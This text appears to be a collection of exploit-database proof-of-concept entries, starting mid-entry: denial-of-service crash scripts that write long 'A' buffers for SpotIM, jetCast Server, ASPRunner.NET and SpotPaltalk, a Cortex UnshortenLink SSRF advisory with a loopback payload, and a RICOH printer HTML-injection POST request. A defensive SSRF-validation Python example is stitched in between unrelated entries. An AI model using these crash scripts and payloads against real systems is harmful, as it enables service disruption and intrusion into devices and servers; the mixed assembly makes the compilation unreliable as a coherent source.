# 5.- Paste clipboard in the Name/Key field 
# 6.- Click 'OK'
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("SpotIM.txt", "w")
f.write(buffer)
f.close()
            
# Exploit Title: Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery
# Date: 2/26/2019
# Exploit Author: Alexandre Basquin
# Vendor Homepage: https://blog.thehive-project.org
# Software Link: https://github.com/TheHive-Project/Cortex
# Version: Cortex <= 2.1.3
# Tested on: 2.1.3
# CVE : CVE-2019-7652

# Exploit description

The "UnshortenLink_1_0" analyzer used by Cortex contains an SSRF vulnerability.


POC:

1. Create a new analysis

2. Select Data Type "URL"

3. Put your SSRF payload in the Data parameter (e.g. "http://127.0.0.1:22")

4. Result can be seen in the main dashboard.


Reported to TheHive Project by Alexandre Basquin on 1/24/2019

The issue has been fixed in UnshortenLink 1.1 released within Cortex-analyzers 1.15.2

References:

https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/
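
A destination check of the kind a URL-unshortening analyzer needs, as an added example that is not TheHive Project's fix and not code from the advisory: every hop of the redirect chain is vetted before it is fetched, so a link that looks public cannot redirect the analyzer to a loopback or internal address. The port allowlist, the injected `resolve` and `fetch_location` callables, and the DNS and redirect tables (constructed, offline) are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}  # assumption: shortened links only use web ports


class BlockedURL(ValueError):
    """The URL must not be fetched by the analyzer."""


def system_resolver(host, port):
    """Resolve host with the OS resolver; returns a list of address strings."""
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def check_url(url, resolve=system_resolver):
    """Return the vetted addresses for url, or raise BlockedURL."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port
    except ValueError:
        raise BlockedURL("malformed URL") from None
    if parts.scheme not in ALLOWED_SCHEMES:
        raise BlockedURL("scheme not allowed: %r" % parts.scheme)
    if not host:
        raise BlockedURL("no host in URL")
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        raise BlockedURL("port not allowed: %d" % port)
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal IP in the URL
    except ValueError:
        try:
            addresses = list(resolve(host, port))
        except OSError:
            addresses = []
    if not addresses:
        raise BlockedURL("host does not resolve: %r" % host)
    for text in addresses:  # every record must be public, not just the first
        try:
            addr = ipaddress.ip_address(text)
        except ValueError:
            raise BlockedURL("unparsable address: %r" % text) from None
        addr = getattr(addr, "ipv4_mapped", None) or addr  # ::ffff:a.b.c.d
        if not addr.is_global:
            raise BlockedURL("%s resolves to non-public address %s" % (host, addr))
    return addresses


def unshorten(url, fetch_location, resolve=system_resolver, max_hops=5):
    """Follow redirects one hop at a time, vetting every hop before fetching.

    fetch_location(url) must issue one request with automatic redirects
    disabled and return the Location header, or None for a final response.
    """
    chain = []
    for _ in range(max_hops + 1):
        check_url(url, resolve)
        chain.append(url)
        location = fetch_location(url)
        if location is None:
            return chain
        url = urljoin(url, location)
    raise BlockedURL("more than %d redirects" % max_hops)


# Constructed offline stand-ins for DNS and for the HTTP fetch.
FAKE_DNS = {
    "short.example": ["93.184.216.34"],
    "landing.example": ["93.184.216.35"],
    "mixed.example": ["93.184.216.36", "10.0.0.5"],
}
FAKE_REDIRECTS = {
    "http://short.example/ok": "https://landing.example/page",
    "http://short.example/inward": "http://127.0.0.1:22",
}


def verdict(url):
    """Run the constructed tables through unshorten and describe the result."""
    try:
        chain = unshorten(url, FAKE_REDIRECTS.get,
                          lambda host, port: FAKE_DNS.get(host, []))
        return "ok: " + " -> ".join(chain)
    except BlockedURL as exc:
        return "blocked: %s" % exc


if __name__ == "__main__":
    for sample in ("http://short.example/ok", "http://127.0.0.1:22",
                   "http://short.example/inward", "http://mixed.example/"):
        print(sample, "=>", verdict(sample))
```

In a real analyzer the request should connect to the address that was vetted, so that a DNS answer changing between the check and the fetch cannot bypass it.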
            
#Exploit Title:  jetCast Server 2.0 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-09
#Vendor Homepage: http://www.jetaudio.com/
#Software Link: http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/Download/jetCast/build/JCS2000.exe
#Tested Version: 2.0
#Tested on: Windows 7 Service Pack 1 x64 

#Steps to produce the crash:
#1.- Run python code: jetCast_Server_2.0.py
#2.- Open jetCast.txt and copy content to clipboard
#3.- Open jetCast Server 
#4.- Select Config 
#5.- In "Log directory" Paste ClipBoard 
#6.- Click on "Ok"
#7.- Click on "Start"
#8.- Crashed

cod = "\x41" * 5000
f = open('jetCast.txt', 'w')
f.write(cod)
f.close()
            
#Exploit Title:  ASPRunner.NET 10.1 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-09
#Vendor Homepage: https://xlinesoft.com/
#Software Link: https://xlinesoft.com/asprunnernet/download.htm
#Tested Version: 10.1
#Tested on: Windows 7 Service Pack 1 x64 

#Steps to produce the crash:
#1.- Run python code: ASPRunner_net_10_1.py
#2.- Open ASPRunner_10_1.txt and copy content to clipboard
#3.- Open ASPRunner.NET
#4.- Click on "Next" > Select "SQLite" database > click on "Next"
#5.- Click on "Create new database" 
#6.- In "Table name" field Paste Clipboard
#7.- Click on "Create table"
#8.- Crashed

cod = "\x41" * 10000
f = open('ASPRunner_10_1.txt', 'w')
f.write(cod)
f.close()
            
# -*- coding: utf-8 -*-
# Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC)
# Date: 09/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/spotpaltalk_setup.exe
# Version: 1.1.5
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt"
# 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard
# 3.- Open SpotPalTalk
# 4.  Select "Register" > "Enter Registration Code..."
# 5.- Paste clipboard in the Name/Key field 
# 6.- Click 'OK'
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("SpotPaltalk.txt", "w")
f.write(buffer)
f.close()
            
# Exploit Title: RICOH SP 4510DN Printer - HTML Injection
# Date: 2019-05-06 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
# Software: RICOH Printer
# Product Version: SP 4510DN
# Vulnerability Type: Code Injection
# Vulnerability: HTML Injection
# CVE: CVE-2019-11845

# An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.

# HTTP POST Request :

POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 102
DNT: 1
Connection: close
Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857

mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E

# HTTP Response :

HTTP/1.1 200 OK
Date: Mon, 06 May 2019 11:42:46 GMT
Server: Web-Server/3.0
Content-Type: text/plain
Expires: Mon, 06 May 2019 11:42:46 GMT
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

[14]